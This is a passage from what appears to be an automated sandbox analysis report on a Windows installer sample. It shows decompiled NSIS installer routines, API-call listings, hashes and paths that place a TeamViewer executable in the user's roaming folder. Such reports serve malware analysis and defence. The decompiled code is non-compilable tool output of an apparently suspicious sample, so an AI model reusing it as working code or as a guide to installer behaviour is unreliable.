                                                                                                                        • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\77Etc0bR2v.exe" $1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\TeamViewer$C:\Users\user\Desktop$C:\Users\user\Desktop\77Etc0bR2v.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                        • API String ID: 2012079721-949403541
                                                                                                                        • Opcode ID: 95b2644de8016f8df3482d777034fb250a64d332808757e83748c09c41b177fd
                                                                                                                        • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                                        • Opcode Fuzzy Hash: 95b2644de8016f8df3482d777034fb250a64d332808757e83748c09c41b177fd
                                                                                                                        • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 79%
                                                                                                                        			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                        				signed int _v8;
                                                                                                                        				struct _ITEMIDLIST* _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				signed char _v20;
                                                                                                                        				signed int _v24;
                                                                                                                        				signed char _v28;
                                                                                                                        				signed int _t36;
                                                                                                                        				CHAR* _t37;
                                                                                                                        				signed int _t39;
                                                                                                                        				char _t45;
                                                                                                                        				char _t46;
                                                                                                                        				char _t48;
                                                                                                                        				int _t49;
                                                                                                                        				char _t51;
                                                                                                                        				void* _t59;
                                                                                                                        				signed int _t65;
                                                                                                                        				signed int _t70;
                                                                                                                        				signed int _t71;
                                                                                                                        				char _t79;
                                                                                                                        				void* _t81;
                                                                                                                        				CHAR* _t82;
                                                                                                                        				void* _t84;
                                                                                                                        				signed int _t91;
                                                                                                                        				signed int _t93;
                                                                                                                        				void* _t94;
                                                                                                                        
                                                                                                                        				_t84 = __esi;
                                                                                                                        				_t81 = __edi;
                                                                                                                        				_t59 = __ebx;
                                                                                                                        				_t36 = _a8;
                                                                                                                        				if(_t36 < 0) {
                                                                                                                        					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                                                                                                                        				}
                                                                                                                        				_t70 =  *0x423ed8 + _t36;
                                                                                                                        				_t37 = 0x422e40;
                                                                                                                        				_push(_t59);
                                                                                                                        				_push(_t84);
                                                                                                                        				_push(_t81);
                                                                                                                        				_t82 = 0x422e40;
                                                                                                                        				if(_a4 - 0x422e40 < 0x800) {
                                                                                                                        					_t82 = _a4;
                                                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                                                        				}
                                                                                                                        				while(1) {
                                                                                                                        					_t79 =  *_t70;
                                                                                                                        					if(_t79 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					__eflags = _t82 - _t37 - 0x400;
                                                                                                                        					if(_t82 - _t37 >= 0x400) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t70 = _t70 + 1;
                                                                                                                        					__eflags = _t79 - 0xfc;
                                                                                                                        					_a8 = _t70;
                                                                                                                        					if(__eflags <= 0) {
                                                                                                                        						if(__eflags != 0) {
                                                                                                                        							 *_t82 = _t79;
                                                                                                                        							_t82 =  &(_t82[1]);
                                                                                                                        							__eflags = _t82;
                                                                                                                        						} else {
                                                                                                                        							 *_t82 =  *_t70;
                                                                                                                        							_t82 =  &(_t82[1]);
                                                                                                                        							_t70 = _t70 + 1;
                                                                                                                        						}
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					_t39 =  *(_t70 + 1);
                                                                                                                        					_t71 =  *_t70;
                                                                                                                        					_t91 = (_t39 & 0x0000007f) << 0x00000007 | _t71 & 0x0000007f;
                                                                                                                        					_a8 = _a8 + 2;
                                                                                                                        					_v28 = _t71 | 0x00000080;
                                                                                                                        					_t65 = _t71;
                                                                                                                        					_v24 = _t65;
                                                                                                                        					__eflags = _t79 - 0xfe;
                                                                                                                        					_v20 = _t39 | 0x00000080;
                                                                                                                        					_v16 = _t39;
                                                                                                                        					if(_t79 != 0xfe) {
                                                                                                                        						__eflags = _t79 - 0xfd;
                                                                                                                        						if(_t79 != 0xfd) {
                                                                                                                        							__eflags = _t79 - 0xff;
                                                                                                                        							if(_t79 == 0xff) {
                                                                                                                        								__eflags = (_t39 | 0xffffffff) - _t91;
                                                                                                                        								_t39 = E00405B88(_t65, _t82, _t91, _t82, (_t39 | 0xffffffff) - _t91);
                                                                                                                        							}
                                                                                                                        							L41:
                                                                                                                        							_push(_t82);
                                                                                                                        							L00405B7C();
                                                                                                                        							_t70 = _a8;
                                                                                                                        							_t82 =  &(_t82[_t39]);
                                                                                                                        							_t37 = 0x422e40;
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						__eflags = _t91 - 0x1d;
                                                                                                                        						if(_t91 != 0x1d) {
                                                                                                                        							__eflags = (_t91 << 0xa) + 0x424000;
                                                                                                                        							_t39 = E00405B66(_t82, (_t91 << 0xa) + 0x424000);
                                                                                                                        						} else {
                                                                                                                        							_t39 = E00405AC4(_t82,  *0x423ea8);
                                                                                                                        						}
                                                                                                                        						__eflags = _t91 + 0xffffffeb - 7;
                                                                                                                        						if(_t91 + 0xffffffeb < 7) {
                                                                                                                        							L32:
                                                                                                                        							_t39 = E00405DC8(_t82);
                                                                                                                        						}
                                                                                                                        						goto L41;
                                                                                                                        					}
                                                                                                                        					_t93 = 2;
                                                                                                                        					_t45 = GetVersion();
                                                                                                                        					__eflags = _t45;
                                                                                                                        					if(_t45 >= 0) {
                                                                                                                        						L12:
                                                                                                                        						_v8 = 1;
                                                                                                                        						L13:
                                                                                                                        						__eflags =  *0x423f24;
                                                                                                                        						if( *0x423f24 != 0) {
                                                                                                                        							_t93 = 4;
                                                                                                                        						}
                                                                                                                        						__eflags = _t65;
                                                                                                                        						if(_t65 >= 0) {
                                                                                                                        							__eflags = _t65 - 0x25;
                                                                                                                        							if(_t65 != 0x25) {
                                                                                                                        								__eflags = _t65 - 0x24;
                                                                                                                        								if(_t65 == 0x24) {
                                                                                                                        									GetWindowsDirectoryA(_t82, 0x400);
                                                                                                                        									_t93 = 0;
                                                                                                                        								}
                                                                                                                        								while(1) {
                                                                                                                        									__eflags = _t93;
                                                                                                                        									if(_t93 == 0) {
                                                                                                                        										goto L29;
                                                                                                                        									}
                                                                                                                        									_t46 =  *0x423ea4;
                                                                                                                        									_t93 = _t93 - 1;
                                                                                                                        									__eflags = _t46;
                                                                                                                        									if(_t46 == 0) {
                                                                                                                        										L25:
                                                                                                                        										_t48 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18),  &_v12);
                                                                                                                        										__eflags = _t48;
                                                                                                                        										if(_t48 != 0) {
                                                                                                                        											L27:
                                                                                                                        											 *_t82 =  *_t82 & 0x00000000;
                                                                                                                        											__eflags =  *_t82;
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        										_t49 = SHGetPathFromIDList(_v12, _t82);
                                                                                                                        										 *0x407278(_v12);
                                                                                                                        										__eflags = _t49;
                                                                                                                        										if(_t49 != 0) {
                                                                                                                        											goto L29;
                                                                                                                        										}
                                                                                                                        										goto L27;
                                                                                                                        									}
                                                                                                                        									__eflags = _v8;
                                                                                                                        									if(_v8 == 0) {
                                                                                                                        										goto L25;
                                                                                                                        									}
                                                                                                                        									_t51 =  *_t46( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18), 0, 0, _t82); // executed
                                                                                                                        									__eflags = _t51;
                                                                                                                        									if(_t51 == 0) {
                                                                                                                        										goto L29;
                                                                                                                        									}
                                                                                                                        									goto L25;
                                                                                                                        								}
                                                                                                                        								goto L29;
                                                                                                                        							}
                                                                                                                        							GetSystemDirectoryA(_t82, 0x400);
                                                                                                                        							goto L29;
                                                                                                                        						} else {
                                                                                                                        							_t68 = (_t65 & 0x0000003f) +  *0x423ed8;
                                                                                                                        							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t65 & 0x0000003f) +  *0x423ed8, _t82, _t65 & 0x00000040);
                                                                                                                        							__eflags =  *_t82;
                                                                                                                        							if( *_t82 != 0) {
                                                                                                                        								L30:
                                                                                                                        								__eflags = _v16 - 0x1a;
                                                                                                                        								if(_v16 == 0x1a) {
                                                                                                                        									_push("\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                        									_push(_t82);
                                                                                                                        									L00405B82();
                                                                                                                        								}
                                                                                                                        								goto L32;
                                                                                                                        							}
                                                                                                                        							E00405B88(_t68, _t82, _t93, _t82, _v16);
                                                                                                                        							L29:
                                                                                                                        							__eflags =  *_t82;
                                                                                                                        							if( *_t82 == 0) {
                                                                                                                        								goto L32;
                                                                                                                        							}
                                                                                                                        							goto L30;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					__eflags = _t45 - 0x5a04;
                                                                                                                        					if(_t45 == 0x5a04) {
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					__eflags = _v16 - 0x23;
                                                                                                                        					if(_v16 == 0x23) {
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					__eflags = _v16 - 0x2e;
                                                                                                                        					if(_v16 == 0x2e) {
                                                                                                                        						goto L12;
                                                                                                                        					} else {
                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *_t82 =  *_t82 & 0x00000000;
                                                                                                                        				if(_a4 == 0) {
                                                                                                                        					return _t37;
                                                                                                                        				}
                                                                                                                        				return E00405B66(_a4, _t37);
                                                                                                                        			}




























                                                                                                                        0x00405d20
                                                                                                                        0x00405cab
                                                                                                                        0x00000000
                                                                                                                        0x00405c69
                                                                                                                        0x00405c6e
                                                                                                                        0x00405c84
                                                                                                                        0x00405c89
                                                                                                                        0x00405c8c
                                                                                                                        0x00405d29
                                                                                                                        0x00405d29
                                                                                                                        0x00405d2d
                                                                                                                        0x00405d2f
                                                                                                                        0x00405d34
                                                                                                                        0x00405d35
                                                                                                                        0x00405d35
                                                                                                                        0x00000000
                                                                                                                        0x00405d2d
                                                                                                                        0x00405c96
                                                                                                                        0x00405d24
                                                                                                                        0x00405d24
                                                                                                                        0x00405d27
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405d27
                                                                                                                        0x00405c67
                                                                                                                        0x00405c3a
                                                                                                                        0x00405c3e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405c40
                                                                                                                        0x00405c44
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405c46
                                                                                                                        0x00405c4a
                                                                                                                        0x00000000
                                                                                                                        0x00405c4c
                                                                                                                        0x00405c4c
                                                                                                                        0x00000000
                                                                                                                        0x00405c4c
                                                                                                                        0x00405c4a
                                                                                                                        0x00405daf
                                                                                                                        0x00405db9
                                                                                                                        0x00405dc5
                                                                                                                        0x00405dc5
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                                        • GetWindowsDirectoryA.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000400), ref: 00405CBE
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                                        • SHGetPathFromIDList.SHELL32(00000000, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 00405D08
                                                                                                                        • 762AA680.OLE32(00000000), ref: 00405D13
                                                                                                                        • lstrcat.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$A680FolderFromListLocationPathSpecialSystemVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 2738003839-1842425495
                                                                                                                        • Opcode ID: 0a1c1a305b72793dfb894d14277ea09d9f1e9f2aa1aa99d6d5a3f05fa8915784
                                                                                                                        • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                                        • Opcode Fuzzy Hash: 0a1c1a305b72793dfb894d14277ea09d9f1e9f2aa1aa99d6d5a3f05fa8915784
                                                                                                                        • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406131() {
                                                                                                                        				unsigned short _t531;
                                                                                                                        				signed int _t532;
                                                                                                                        				void _t533;
                                                                                                                        				void* _t534;
                                                                                                                        				signed int _t535;
                                                                                                                        				signed int _t565;
                                                                                                                        				signed int _t568;
                                                                                                                        				signed int _t590;
                                                                                                                        				signed int* _t607;
                                                                                                                        				void* _t614;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t614 - 0x40) != 0) {
                                                                                                                        						 *(_t614 - 0x34) = 1;
                                                                                                                        						 *(_t614 - 0x84) = 7;
                                                                                                                        						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                        						L132:
                                                                                                                        						 *(_t614 - 0x54) = _t607;
                                                                                                                        						L133:
                                                                                                                        						_t531 =  *_t607;
                                                                                                                        						_t590 = _t531 & 0x0000ffff;
                                                                                                                        						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                        						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                        							 *(_t614 - 0x40) = 1;
                                                                                                                        							_t532 = _t531 - (_t531 >> 5);
                                                                                                                        							 *_t607 = _t532;
                                                                                                                        						} else {
                                                                                                                        							 *(_t614 - 0x10) = _t565;
                                                                                                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                        							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                        						}
                                                                                                                        						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                        							L139:
                                                                                                                        							_t533 =  *(_t614 - 0x84);
                                                                                                                        							L140:
                                                                                                                        							 *(_t614 - 0x88) = _t533;
                                                                                                                        							goto L1;
                                                                                                                        						} else {
                                                                                                                        							L137:
                                                                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                                                                        								 *(_t614 - 0x88) = 5;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                        							goto L139;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        						__esi =  *(__ebp - 0x60);
                                                                                                                        						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        						__ecx =  *(__ebp - 0x3c);
                                                                                                                        						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        						__ecx =  *(__ebp - 4);
                                                                                                                        						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        						if( *(__ebp - 0x38) >= 4) {
                                                                                                                        							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        								_t97 = __ebp - 0x38;
                                                                                                                        								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							 *(__ebp - 0x38) = 0;
                                                                                                                        						}
                                                                                                                        						if( *(__ebp - 0x34) == __edx) {
                                                                                                                        							__ebx = 0;
                                                                                                                        							__ebx = 1;
                                                                                                                        							L60:
                                                                                                                        							__eax =  *(__ebp - 0x58);
                                                                                                                        							__edx = __ebx + __ebx;
                                                                                                                        							__ecx =  *(__ebp - 0x10);
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								_t216 = __edx + 1; // 0x1
                                                                                                                        								__ebx = _t216;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								L59:
                                                                                                                        								if(__ebx >= 0x100) {
                                                                                                                        									goto L54;
                                                                                                                        								}
                                                                                                                        								goto L60;
                                                                                                                        							} else {
                                                                                                                        								L57:
                                                                                                                        								if( *(__ebp - 0x6c) == 0) {
                                                                                                                        									 *(__ebp - 0x88) = 0xf;
                                                                                                                        									goto L170;
                                                                                                                        								}
                                                                                                                        								__ecx =  *(__ebp - 0x70);
                                                                                                                        								__eax =  *(__ebp - 0xc);
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								_t202 = __ebp - 0x70;
                                                                                                                        								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								goto L59;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							__eax =  *(__ebp - 0x14);
                                                                                                                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 8);
                                                                                                                        							__ebx = 0;
                                                                                                                        							__ebx = 1;
                                                                                                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        							L40:
                                                                                                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        							 *(__ebp - 0x48) = __eax;
                                                                                                                        							__eax = __eax + 1;
                                                                                                                        							__eax = __eax << 8;
                                                                                                                        							__eax = __eax + __ebx;
                                                                                                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__edx = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								 *(__ebp - 0x40) = 1;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__ebx = __ebx + __ebx + 1;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edx;
                                                                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								L38:
                                                                                                                        								__eax =  *(__ebp - 0x40);
                                                                                                                        								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        									while(1) {
                                                                                                                        										if(__ebx >= 0x100) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										__eax =  *(__ebp - 0x58);
                                                                                                                        										__edx = __ebx + __ebx;
                                                                                                                        										__ecx =  *(__ebp - 0x10);
                                                                                                                        										__esi = __edx + __eax;
                                                                                                                        										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        										__ax =  *__esi;
                                                                                                                        										 *(__ebp - 0x54) = __esi;
                                                                                                                        										__edi = __ax & 0x0000ffff;
                                                                                                                        										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											__cx = __ax;
                                                                                                                        											_t169 = __edx + 1; // 0x1
                                                                                                                        											__ebx = _t169;
                                                                                                                        											__cx = __ax >> 5;
                                                                                                                        											 *__esi = __ax;
                                                                                                                        										} else {
                                                                                                                        											 *(__ebp - 0x10) = __ecx;
                                                                                                                        											0x800 = 0x800 - __edi;
                                                                                                                        											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        											__ebx = __ebx + __ebx;
                                                                                                                        											 *__esi = __cx;
                                                                                                                        										}
                                                                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                                                                        										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                        											L45:
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t155 = __ebp - 0x70;
                                                                                                                        											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									L53:
                                                                                                                        									_t172 = __ebp - 0x34;
                                                                                                                        									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        									L54:
                                                                                                                        									__al =  *(__ebp - 0x44);
                                                                                                                        									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        									L55:
                                                                                                                        									if( *(__ebp - 0x64) == 0) {
                                                                                                                        										 *(__ebp - 0x88) = 0x1a;
                                                                                                                        										goto L170;
                                                                                                                        									}
                                                                                                                        									__ecx =  *(__ebp - 0x68);
                                                                                                                        									__al =  *(__ebp - 0x5c);
                                                                                                                        									__edx =  *(__ebp - 8);
                                                                                                                        									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        									 *( *(__ebp - 0x68)) = __al;
                                                                                                                        									__ecx =  *(__ebp - 0x14);
                                                                                                                        									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        									__eax = __ecx + 1;
                                                                                                                        									__edx = 0;
                                                                                                                        									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                        									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        									__edx = _t191;
                                                                                                                        									L79:
                                                                                                                        									 *(__ebp - 0x14) = __edx;
                                                                                                                        									L80:
                                                                                                                        									 *(__ebp - 0x88) = 2;
                                                                                                                        									goto L1;
                                                                                                                        								}
                                                                                                                        								if(__ebx >= 0x100) {
                                                                                                                        									goto L53;
                                                                                                                        								}
                                                                                                                        								goto L40;
                                                                                                                        							} else {
                                                                                                                        								L36:
                                                                                                                        								if( *(__ebp - 0x6c) == 0) {
                                                                                                                        									 *(__ebp - 0x88) = 0xd;
                                                                                                                        									L170:
                                                                                                                        									_t568 = 0x22;
                                                                                                                        									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                        									_t535 = 0;
                                                                                                                        									L172:
                                                                                                                        									return _t535;
                                                                                                                        								}
                                                                                                                        								__ecx =  *(__ebp - 0x70);
                                                                                                                        								__eax =  *(__ebp - 0xc);
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								_t121 = __ebp - 0x70;
                                                                                                                        								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        								goto L38;
                                                                                                                        							}
